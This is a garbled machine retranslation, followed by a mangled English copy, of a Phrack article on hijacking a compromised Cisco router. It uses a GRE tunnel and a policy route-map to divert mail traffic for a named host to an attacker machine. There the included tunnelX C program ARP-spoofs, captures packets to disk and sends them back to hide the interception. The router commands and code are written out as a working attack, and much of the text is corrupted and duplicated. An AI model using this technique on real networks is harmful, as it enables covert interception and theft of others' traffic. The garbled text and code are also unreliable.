| ------------------------------- Translation by Mix --------------- ----------------- || ---------------- and before, I want to declaration, I am not a professional translator ----------------- || --------- So I can only use the original meaning of the original meaning according to my own understanding ---- ------ || -------------- With the ability to see the original, my translation can only be used as a reference ------------ - || ------------ After the translation, I feel basically clear that these things, the details are difficult to say ------------- | - Phrackmagazine -Volume 0xa Issue 0x3805.01.20000x0a [0x10] | ------------------ When we fully control the Cisco router ----------- ------- || ----------------------------------------- ---------------------------------------------------- -------------- Gauis
When you set up everything on the routing, you will get sniffing on the router. ---- | 3. Unveiling the secrets of change Routing path You have to do this is to change the channel that changes the route. Send the message sent from the target via the router to other places, then capture this message, and finalize this message Send it to the router and guarantees that this process does not seem to have happened.
Under normal circumstances, a typical routing configuration will use the process of routing information to represented by the following figure: Internet ------------ Cisco ------------ Target external network Ethernet0 Serial0CISCO routers target machine and then we this operation: # telnet ciscoTrying 192.168.1.240 ... Connected to 192.168.1.240.Escape character is '^]' User Access VerificationPassword:. cisco> enablePassword: cisco # configure termEnter configuration commands, one per line. End with CNTL / Z.cisco (config) # int tunnel0cisco (config-if) # ip address 192.168.0.1 255.255.255.0cisco (config-if) # tunnel mode? aurp AURP TunnelTalk AppleTalk encapsulationcayman Cayman TunnelTalk AppleTalk encapsulationdvmrp DVMRP multicast tunneleon EON compatible CLNS tunnelgre generic route encapsulation protocolipip IP over IP encapsulationnos IP over IP encapsulation (KA9Q / NOS compatible) cisco (config-if) # tunnel mode gre ipcisco (config-if) # tunnel source? ABCD ip addressBRI ISDN Basic Rate InterfaceDialer Dialer interfaceEthernet IEEE 802.3LEX Lex Interfaceloopback loopback Interfacenull Null InterfaceTunnel Tunnel Interfacecisco (config-if) # tunnel Source Ethernet0 / 0 / 0cisco (config-if) # tunnel destination 192.168.1.1cisco (config-if) # ^ Zcisco # show interfaces Tunnel0Tunnel0 is up, line protocol is upHardware is TunnelInternet address is 192.168.0.1/24MTU 1500 bytes, BW 9 kbit, DLY 500000 usec, rely 255/255, load 1 / 255Encapsulation tUNNEL, loopback not set, keepalive set (10 sec) tunnel source 192.168.1.240 (Ethernet0), destination 192.168.1.1Tunnel protocol / transport GRE / IP, key disabled , sequencing disabledChecksumming of packets disabled, fast tunneling enabledLast input never, output never, output hang neverLast clearing of "show interface" counters neverInput queue: 0/75/0 (size / max / drops);
Total output drops: 05 minute input rate 0 bits / sec, 0 packets / sec5 minute output rate 0 bits / sec, 0 packets / sec0 packets input, 0 bytes, 0 no bufferReceived 0 broadcasts, 0 runts, 0 giants0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort0 packets output, 0 bytes, 0 underruns0 output errors, 0 collisions, 0 interface resets0 output buffer failures, 0 output buffers swapped outcisco # tcpdump will not output any results unless You try Ping other IP at 192.168.0.1/24. You will see some ICMP packets encapsulated with a GRE package from 192.168.1.1 47 ports. In your Linux window, determine the protocol (port) 47 No firewall blocking, test # ipchains -i input -p 47 -j accept # modprobe ip_gretest # ip Tunnel Add Tunnel0 Mode Gre Remote 192.168.1.240 local192. 168.1.1test # ifconfig tunnel0 192.168.0.2 netmask 255.255.255.0test # ping 192.168.0.2PING 192.168.0.2 (192.168.0.2): 56 data bytes64 bytes from 192.168.0.2: icmp_seq = 0 ttl = 255 time = 0.3 ms ^ C Ok, our new routing line has been completed. This way you can see the data transfer of the default GRE package. There is no handshake connection here because we are not using GRE2 and stupid PPTP packages in the network of M $. Test # tcpdump -i Eth1 Host 192.168.1.240 and not port 23tcpdump: listening on et111: 04: 44.092895 arp Who-Has Cisco Tell Private-GW11: 04: 44.094498 ARP Reply Cisco IS-AT 0: 6D: EA: DB: E : EF11: 04: 44.094528 192.168.0.2> 192.168.0.1: ICMP: Echo Request (GRE ENCAP) 11: 04: 44.097458 192.168.0.1> 192.168.0.0.1> 192.168.0.2: ICMP: Echo reply (gre encap) We can see GRE package The data information is very detailed, and the encoder of the Cisco router will send the data directly to Linux, and did not send it to the place where it is going. Let us go to ftp.ee.lbl.gov to see the source code of TCPDump. The TCPDump source code is very beautiful; we need a slight change in the print-gre.c file to get more useful information in the process of tunnel technology implementation.
---- | 4. Tunnel technology - IOS line change transparency and data capture I initialize new CVS Tree based on LibPCAP and LIBNET, some GRE header files are captured by TCPDUMP, but after a short break I decided to reach it, so that the whole process is more simple and clear: - In order to avoid the data storm, we will not generate a data storm when we do network deception (Ether_spoof), we define an empty unused IP address in the Ethernet ( It is called Reentry in the original text. - We initially set a LibPCAP and Libnet and established a data link. - Then we write a program to encapsulate the data cladding, so that these data seem to be an IP packet that matches the GRE protocol, and sent to the tunnel exit, just like the ARP response packet. - Our ARP Paraser (PARSER) will analyze whether it is from Reentry response or the response sent by network spoof (ether_spoof). - Our GRE Paramers (Parser) will switch related information in source data, such as source IP addresses, destination IP addresses, and use PCAP_DUMP () to record data packets to disk, then make TTL values 1 (or more ), Finally calculate the checksum and send the data to the data using libnet_write. - OK, this is the case, don't doubt it, you can achieve this. Now entering an interesting phase, we have to reset the Cisco router (define all the access lists used to pass all the data we have changed). telnet 192.88.115.98 ... config termint tunnel0ip address 192.168.0.1 255.255.255.0tunnel mode gre iptunnel source Ethernet0tunnel destination TUNNELX_REENTRY_IP! access-list 111 permit tcp any host 192.88.209.10 25! route-map certisownedmatch ip address 111set ip next-hop 192.168.0.7 !! Interface Ethernet0Description to CERT.ORGIP Address 192.88.115.98ip policy route-map certsis ^ z If you first set the tunnel, you can use it normally. This Access List we created, the routing link will not have any conflicts. However, when you modify the Cisco router configuration, you have to do very carefully. Delete Route Map before you delete Access List (Remove the Route Map First, ", this sentence, I think I didn't translate it completely, so everyone still read the original text. Better), otherwise it will cause death cycle of data. Practice on a small Cisco 1600 router. Also don't get too far from the router. When we use ARP spoof, people can get a response message from the network host that does not exist, so we have to be more careful. I said that there is something worth our utilization in iOS SRC, this is their encryption. You can build an encrypted tunnel, use the same encryption key to get the information to be encrypted, and the information returned back can be decrypted normally.
Tunnel technology can also be like this, you also need to use an encryption mechanism in the PCAP data clamp, and ensure that the data can be decrypted after data transmission. OH, of course, I didn't explain anything about PCAP, you can write a small program from the tunnel to analyze the PCAP data format from the tunnel, pay attention to allowing this applet to ger packaging data, and can generate a file for each connection . Lseek () This function will be the key to solving this problem. This article will not publish it in normal bugtraq, or when the administrator gets, the PCAP Data Analyzer will not be included. If you need a special edition program or related technical support, send money first I (555 he and I want money). ---- | 5. Greetings and comments: R! Cat GreetList | Sort -u | SED -E 'S / $ /, /' | Xargs #hax IDlers, ACPIZER, AKG, Antilove (Your Piggy Coding Style is Great AWR, BINF, CB, Cisco9, Ee.lbl.gov, F1x, Gamma, Ice, Jarvis, Joey, Kil3r, Klog, Meta, Minus, Nises, Octa, Plaguez, Plasmoid, Route (THX 4 Libnet), Scalp , Scuzzy, SHOK, SWR, TESO CREW, THE OWL, TMOGGIE, ULTOR, WILKINS, ZE OTHERS I Forgot, (I don't know what to say, 555) I always like to work under the high version of routing software so that I can make me The route deceived hijacking plan is easier to implement, and even let me feel that I will track the prey when hunting ... Don't forget you are working above, you can do anything, because everyone trusts everything: ).
---- | 6. Program code // I have never been compiled yet, my virtual machine Linux is playing broken ~~~ Hehe < > p56 / tunnelx / tunnelx.c! 0d503a37 // tunnelX IS part of the research and development effort // conducted by HERT. These are not production tools for either attack or // defense within an information warfare setting. Rather, they are small // modifications demonstrating proof of concept.// comments and crap to Gaius@hert.org// to Compile on Solaris: (i buy2-0.99g) // gcc-^^^^^^^^^^^^^^^^^^^^^^^^^ 00 -lnsl libpcap.a libnet.a // on linux: // gcc -o2 -i. `libnet-config --defines` -c tunnelx.c // gcc - ^ Tunnelx.o -o tunnelx libpcap.a libnet. A # IF (Have_config_h) #include "config.h" # Endif # include
Le0 "; char * device = null; void pcap_print (u_char * user, const struct pcap_pkthdr * h, const u_char * p); CHAR Errbuf [256]; INTMAIN (int Argc, char * argv []) {Int CNT, C , ret, snaplen; bpf_u_int32 localnet, netmask; char ebuf [PCAP_ERRBUF_SIZE]; char pcapexp [50]; pcap_t * pd; struct bpf_program fcode; pcap_handler printer; u_char * pcap_userdata; snaplen = SNAPLEN; printer = pcap_print; while ((c = Getopt (Argc, Argv, "i:"))! = EOF) {Switch (c) {CASE 'I': Device = OPTARG; Break; default: exit (exit_failure);}} // inet_aton (tunnelx_reentry, / _sspoof ); ip_spoof = libnet_name_resolve (TUNNELX_REENTRY, 0); device = default_dev; if (device) {fprintf (stderr, "Specify a device / n"); exit (EXIT_FAILURE);}! li = libnet_open_link_interface (device, errbuf); if (! li) {fprintf (stderr, "libnet_open_link_interface:% s / n", errbuf); exit_failure;} if (device == null) device = PCAP_LOOKUPDEV (EBUF); if (Device == Null) Printf "% s", ebuf); PD = PCAP_Open_Live (Device, Snaplen, 1, 500, Errbuf); if (Pd == Null) {fprintf (stderr, "PCAP_OP EN_LIVE:% S / N ", Errbuf); RETURN (-1);} if (pd == null) Printf ("% s ", ebuf); RET = PCAP_SNAPSHOT (PD); if (Snaplen } IF (PCAP_LOOP (PD, CNT, Printer, PCAP_USERDATA) <0) {(void) fprintf (stderr, "pcap_loop:% s / n", PCAP_GETERR (PD)); exit (1);} PCAP_CLOSE (PD); exit (0);} voidpcap_print (u_char * user, const struct pcap_pkthdr * h, const u_char * p) {register struct libnet_ethernet_hdr * eh; register struct gre_hdr * gh; register struct libnet_ip_hdr * ih; register struct libnet_arp_hdr * ah; register char * dst, * src; register u_int ih_length, payload_length, off; u_int length = h-> len; u_int caplen = h-> caplen; u_short proto; struct ether_addr tmp_ea; packetp = p; snapend = p caplen; eh = ( struct libnet_ethernet_hdr *) p; p = sizeof (struct libnet_ethernet_hdr); caplen - = sizeof (struct libnet_ethernet_hdr); length - = sizeof (struct libnet_ethernet_hdr); switch (ntohs (eh-> ether_type)) {case ETHERTYPE_IP: ih = ( STRUCT libnet_ip_hdr *) p; IH_LENGTH = IH-> ip_hl * 4; payload_length = NTOHS (IH-> ip_len); payload_length - = IH_LENGTH; OFF = NTOHS (IH-> ip_off); if ((OFF & 0x1FFF) == 0 ) {p = (u_char *) IH IH_LENGTH; SRC = strDUp (inet_nt OA (ih-> ip_src)); DST = STRDUP (INET_NTOA (IH-> IP_DST)); Switch (IH-> IP_P) {# IFNDEF IPPROTO_GRE # Define ipproto_gre 47 # endifcase ipproto_gre: gh = (struct gre_hdr *) P; P = 4; if (Memcmp_DST, _SPOOF, 4) == 0) {// Reverse Gre Source and DestinationMemcpy (TMP_EA.ETHER_ADDR_OCTET,> IP_SRC, 4); Memcpy (> IP_SRC,> IP_DST, 4); memcpy (> ip_dst, tmp_ea.ether_addr_octet, 4); // ih-> ip_id ; // reverse Ether source and destinationmemcpy (tmp_ea.ether_addr_octet, eh-> ether_shost, ETHER_ADDR_LEN); memcpy (eh-> ether_shost, eh-> ether_dhost , Ether_addr_len); memcpy (eh-> ether_dhost, tmp_ea.ether_addr_octet, ETHER_ADDR_LEN); // dope the ttl upih-> ip_ttl = 64; if (libnet_do_checksum ((u_char *) ih, IPPROTO_IP, ih_length) == -1) return; if (libnet_write_link_layer (li, device, (u_char *) eh, payload_length ih_length sizeof (struct libnet_ethernet_hdr)) == -1) return; pcap_dump (user, h, packetp);} proto = EXTRACT_16BITS (> proto); break; default: return;}} break Case ethertype_arp: // process arpah = (struct libnet_arp_hdr *) p; if (extract_16bits (> ar_op)! = arpop_request) {return;}} (Memcmp (Ah-> Ar_tpa, _SPOOF, 4)! = 0) Return; // swap ip source and address i use ar_tha as a temptorray placeholdermemcpy (ah-> ar_tha, ah-> ar_spa, 4); memcpy (ah-> ar_spa, ah-> ar_tpa, 4); memcpy (ah-> ar_tpa , AH-> Ar_THA, 4); // Move Ether AddR Source To Both destinationMemcpy (eh-> ether_dhost, ether_addr_len); Memcpy (Ah-> Ar_THA, EH-> Ether_SHOST, Ether_ADDR_LEN); // COPY Fake Ether Addr To Both SourceMemcpy (EH-> Ether_SHOST, Ether_SPOOF, Ether_ADDR_LEN); Memcpy (Ah-> Ar_SHA, ETH Er_spoof, ether_addr_len); // set arp op code to replyah-> ar_op = htons (2); if (libnet_write_link_layer (li, device, (u_char *) EH, ARP_H Eth_h) == -1) Return;} } <-> | eof | -------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------------- | Attraction as follows: - phrackmagazine -volume 0xa Issue 0x3805.01.20000x0a [0x10] | ----------------- Things to do in ciscoland when're dead ---------------- || ----- -------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Gauis --------------------------- | V0.2 1/1/00 ---- | 1. DisclaimertunnelX (The Code) IS Part of the research and development effort conducted byHERT (Hacker Emergency Response Team). It is not a production tool for eitherattack or defense within an information warfare setting. Rather, it is aproject demonstrating proof of concept.If you are not the intended recipient, or a person responsible for deliveringit to the intended recipient, you are not authorized to and must not disclose, copy, distribute, or retain this message or any part of it. Such unauthorizeduse may be unlawful. If you have received this transmission in error, pleaseemail us immediately at hert@hert.org so that we can arrange for its return.The views expressed in this document are not necessarily the views of HERT.Its directors, officers or employees make no representation or accept anyliability for its accuracy or completeness unless expressly Stated to thecontrary. ------ | 2. IntroductionWhen I Think About Routers in General, i Feel Exactly Like I do When I Go Tothe Supermarket and See All this food and then can't stop thinking of madcow disease, cjd, gmo ... it makes me feel dizzy. Just Go on Cisco.com Andcheck What Cisco 7500 IS used for and how many corporations own them and howmany thousands of machines get routed through them ... There is even atraceroute map somewhere that can give you an idea of how deeply dependant weare on these routers. It's been a long time since I stopped believing Insecurity, The Core of The Security Problem is real Because We Are TrustingTrust (Read Ken Thomson's Article, Reflections On Trusting Trust), IF I Didbelieve In Security Then I Wouldn ' Tests.how Many Times Have You Heard People Saying, "Hey I 0wn this Cisco, IT Would Becool I Had iOS Src ... i Could Trojan and Recompile It and do this andthat.", How Many Times Have . you heard of people wondering what the fuck theycould do with an enable password The IOS src has been floating around forquite a while now and no-one'z done anything with it yet; at least not amongthe regular bugtraq letspretendtobefulldisclosure readers.Well you don 't even really need the IOS src, everything you need is alreadythere, (there is only one little thing that would be nice to have from the srcbut we'll talk about it below). you can load up the image in IDA, nop out acouple of instructions and the cisco's rmon implementation will not zero thepayload anymore and you have a IOS sniffer .---- | 3. Rerouting demystifiedWhat you want to do is reroute some traffic from a router and send it to someother place, capture IT and RESEND IT to THE ROUTER AND MAKE IT LOOKENOTHING EV Er happened. Normal Operation ON A Typical Config Will Look LikeThis: Internet ------------ Cisco ------------ TargeTthernet0 Serial0what We Are Going to Do Is: # telnet Ciscotrying 192.168.1.240 ... connection to 192.168.1.240.escape character is '^]'. User Access VerificationPassword: Cisco> enablePassword:. cisco # configure termEnter configuration commands, one per line End with CNTL / Z.cisco (config) # int tunnel0cisco (config-if) # ip address 192.168.0.1 255.255.255.0cisco (config-if) # tunnel mode? aurp AURP TunnelTalk AppleTalk encapsulationcayman Cayman TunnelTalk AppleTalk encapsulationdvmrp DVMRP multicast tunneleon EON compatible CLNS tunnelgre generic route encapsulation protocolipip IP over IP encapsulationnos IP over IP encapsulation (KA9Q / NOS compatible) cisco (config-if) # tunnel mode gre ipcisco (config-if) # tunnel source? ABCD ip addressBRI ISDN Basic Rate InterfaceDialer Dialer interfaceEthernet IEEE 802.3Lex Lex interfaceLoopback Loopback interfaceNull Null interfaceTunnel Tunnel interfacecisco (config-if) # tunnel source Ethernet0 / 0 / 0cisco (config-if) # tunnel destination 192.168.1.1cisco ( Config-IF) # ^ zcisco # show interfaces tunnel0tunnel0 IS UP, LINE Protocol is Uphardware is TunnelInternet Address IS 192.168.0.1/24mtu 1500 Bytes, BW 9 Kbit, DLY 500000 Usec, Rely 25 5/255, load 1 / 255Encapsulation TUNNEL, loopback not set, keepalive set (10 sec) Tunnel source 192.168.1.240 (Ethernet0), destination 192.168.1.1Tunnel protocol / transport GRE / IP, key disabled, sequencing disabledChecksumming of packets disabled, Fast Tunneling EnableDlast Input Never, Output Never, Output HANG Neverlast Clearing of "Show Interface" Counters NeverInput Queue: 0/75/0 (size / max / drops); Total output drops: 05 minute input rate 0 bits / sec, 0 packets / sec5 minute output rate 0 bits / sec, 0 packets / sec0 packets input, 0 bytes, 0 no bufferReceived 0 broadcasts, 0 runts, 0 giants0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort0 packets output, 0 bytes, 0 underruns0 output errors, 0 collisions, 0 interface resets0 output buffer failures, 0 output buffers swapped outcisco # At that point tcpdump will not show any output unless you try to ping an IP onthe 192.168.0.1/24 network. you will see some GRE encapsulated ICMP packetsand some icmp proto 47 unreach packet coming from 192.168.1.1.On your linux test box, make sure you have protocol number 47 unfirewalled, test # ipchains -I input -p 47 -j ACCEPT # accept GRE protocoltest # modprobe ip_gretest # ip tunnel add tunnel0 mode gre remote 192.168.1.240 local192.168.1.1test # ifconfig tunnel0 192.168.0.2 netmask 255.255.255.0test # ping 192.168. 0.2PING 192.168.0.2 (192.168.0.2): 56 Data bytes64 bytes from 192.168.0.2: ICMP_SEQ = 0 ttl = 255 time = 0.3 ms ^ COk our link is up. And as you can see by default GRE is really stateless.There is no handshake, as we are not in Microsoft land with GRE2 and stupidPPTP.test # tcpdump -i eth1 host 192.168.1.240 and not port 23tcpdump: listening on eth111: 04: 44.092895 arp who-has cisco tell private-gw11: 04: 44.094498 arp reply cisco is-at 0: 6d: ea: db: e: ef11: 04: 44.094528 192.168 .0.2> 192.168.0.1: ICMP: Echo Request (GRE ENCAP) 11: 04: 44.097458 192.168.0.1> 192.168.0.0.1> 192.168.0.0.0.1> 192.168.0.0.0.1> 192.168.0.2: ICMP: Echo reply (GRE ENCAP) GRE'S RFC ISN 'REALLY VERBOSE, AND CISCO CODERS Are Bashed in The Linux Greimplementation Source for Not Respecting Their OWN RFC.LET'S LOOK AT TCPDUMP SRC on ftp.ee.lbl.gov. Tcpdump Sources Are Nice in the file print-gre.c we have most of the info we need to start codingtunnelx .---- | 4. tunnelx - IOS Transparent reroute and captureI initialized a new CVS tree with libpcap and libnet, some gre header rippedfrom tcpdump, reread pcap's manpage while eating some Chunky Monkey, tooka glance at libnet's API doc and cleaned off the pizza bits and ice creamfrom my fingers and decided to code something really simple and see if itworks: - We define an unused IP address we call REENTRY and a fake ethernet address toavoid a protocol unreachable storm that we call ETHER_SPOOF.- We initialize libpcap and libnet and set up a pcap_loop.- Then we make a pcap handler, which look for IP packets matching the GREprotocol which are going to the tunnel exit point address as well as ARPrequest packets.- Our ARP parser bails out if it is not a request for REENTRY or send a replywith ETHER_SPOOF.- Our GRE parser simply swaps IP and ether source and destitution, andwrites the packet to disk with pcap_dump (),Increase the TTL, Recomputethe Checksum and flush it with libnet_write.- That's it !!! NEVER Would Have Believed It Would Have So Simple. Nowcomes The tricky part; we have to configure the cisco correctly (define anaccess list with all the stuff you want to reroute in it) .telnet 192.88.115.98 ... config termint tunnel0ip address 192.168.0.1 255.255.255.0tunnel mode gre iptunnel source Ethernet0tunnel destination TUNNELX_REENTRY_IP! access -list 111 permit tcp any host 192.88.209.10 25! route-map certisownedmatch ip address 111set ip next-hop 192.168.0.7 !! interface Ethernet0description to cert.orgip address 192.88.115.98ip policy route-map certisowned ^ ZIf you had tunnelx up and running before setting up the cisco config then itshould work now !!! and traceroute does not show any thing since its packetsare not matched by our access list! BEWARE, however, when you want to disable the cisco configuration. Remove theroute map first with 'no route-map certisowned' * before * the access listotherwise it will match all packets and will go in an endless loop. Tryit on a small cisco 1600 before going in the wild with this stuff. Also trynot to be far away from theythe cisco. People can only know on which networkpackets are captured not the actual host since we are arp spoofing, so takeadvantage of that.I said in the intro that some bits from IOS src would be nice to use, itis their crypto code. You can setup an encrypted tunnel, make it use thesame key on both way so it will encrypt outgoing packets and decrypt them whenthey come back. Tunnelx is just the same. You just need to add the cryptoroutine in your pcap reader to make it decrypt the traffic .Oh yes, i DIDN ' t talk about the pcap reader, you can just make a small programthat parses the pcap dump from tunnelx, make it un-encapsulate the GRE packet, and create files for each session. lseek () is the key to do it without missingout of order packets or getting messed up by duplicates. Since this articleis not destined for the average bugtraq or rootshell reader, the pcap dumpparser is not included, you can send me some cash if you need a special versionof tunnelx or need technical support .--- - | 5. Greeting and final Words: r! Cat GreetList | Sort -u | SED -E 'S / $ /, /' | Xargs #hax IDlers, ACPIZER, AKG, Antilove (Your Piggy Coding Style Is Great), AWR , Binf, CB, Cisco9, Ee.lbl.gov, F1x, Gamma, Ice, Jarvis, Joey, Kil3r, Klog, Meta, Minus, Nises, OCTA, Plaguez, Plasmoid, Route (THX 4 Libnet), Scalp, Scuzzy, SHOK, SWR, TESO CREW, THE OWL, TMOGGIE, ULTOR, WILKINS, ZE OTHERS I Forgot, I am Already Working on a New Version That Will Let you do spoofing, hunt ... don't forget You'r E-awes, and everyone trusts you:). ---- | 6. The code < > p56 / tunnelx / tunnelx.c! 0d503a37 // tunnelx is part of the research and development effort // conducted by HERT. These are not production tools for either attack or // defense within an information warfare setting. Rather, they are small // modifications demonstrating proof of concept.// comments and crap to gaius@hert.org// To Compile On Solaris: (I used libnet-0.99g) // gcc-^^ - -dlibnet_big_endian -wall -c tunnelx.c // gcc-^ tunnelx.o -o tunnelx -lsocket -lnsl libpcap.a libnet. A // on linux: // gcc -o2 -i. `Libnet-config --defines` -c tunnelx.c // gcc -o2 tunnelx.o -o tunnelx libpcap.a libnet.a # if (have_config_h) #include "config.h" # Endif # include libnet_name_resolve (TUNNELX_REENTRY, 0); device = default_dev; if (device!) {fprintf (stderr, "Specify a device / n"); exit (EXIT_FAILURE);} li = libnet_open_link_interface (device, errbuf); if (li!) {FPRINTF (stderr, "libnet_open_link_interface:% s / n", errbuf); exit (exit_fail);} if (device == null) device = pcap_lookupdev (ebuf); if (device == null) Printf ("% s" , EBUF); PD = PCAP_Open_Live (Device, Snaplen, 1, 500, Errbuf); if (PD == Null) {fprintf (stderr, "pcap_open_live:% s / n", errbuf); return (-1);} IF (PD == NULL) Printf ("% s", ebuf); RET = PCAP_SNAPSHOT (PD); IF (Snaplen caplen; eh = (struct libnet_ethernet_hdr *) p; p = sizeof (struct libnet_ethernet_hdr); caplen - = sizeof (struct libnet_ethernet_hdr); length - = sizeof (struct libnet_ethernet_hdr); switch (ntohs (eh-> ether_type)) {case ETHERTYPE_IP: ih = (struct libnet_ip_hdr *) p; ih_length = ih-> ip_hl * 4; payload_length = ntohs (ih-> ip_len); payload_length - = ih_length; off = ntohs (ih-> ip_off); if ((off & 0x1FFF) == 0) {p = (u_char *) IH IH_LENGTH; SRC = STRDUP (INET_NTOA (IH-> IP_SRC)); DST = STRDUP (INET_NTOA (IP_DST)); Switch (IH-> IP_P) {#ifndef IPPROTO_GRE # define IPPROTO_GRE 47 # endifcase IPPROTO_GRE: gh = (struct gre_hdr *) p; p = 4; if (memcmp (> ip_dst, _spoof, 4) == 0) {// reverse GRE source and destinationmemcpy ( tmp_ea.ether_addr_octet,> ip_src, 4); memcpy (> ip_src,> ip_dst, 4); memcpy (> ip_dst, tmp_ea.ether_addr_octet, 4); // ih-> ip_id ; // reverse Ether source and destinationmemcpy (tmp_ea. Ether_addr_octet, eh-> ether_shost, ether_addr_len); Memcpy (eh-> ether_shost, ether_addr_len); Memcpy (Eh-> ether_dhost, tmp_ea.ether_addr_octet, ETHER_ADDR_LEN); // dope the ttl upih-> ip_ttl = 64; if (libnet_do_checksum ((u_char *) ih, IPPROTO_IP, ih_length) == -1) return; if (libnet_write_link_layer ( li, device, (u_char *) eh, payload_length ih_length sizeof (struct libnet_ethernet_hdr)) == -1) return; pcap_dump (user, h, packetp);} proto = EXTRACT_16BITS (> proto); break; default: return }}} Break; Case ETHERTYPE_ARP: // Process Arpah = (Struct Libnet_arp_hdr *) P; if (extract_16bits (> ar_op)! = arpop_request) {return;}}}}}
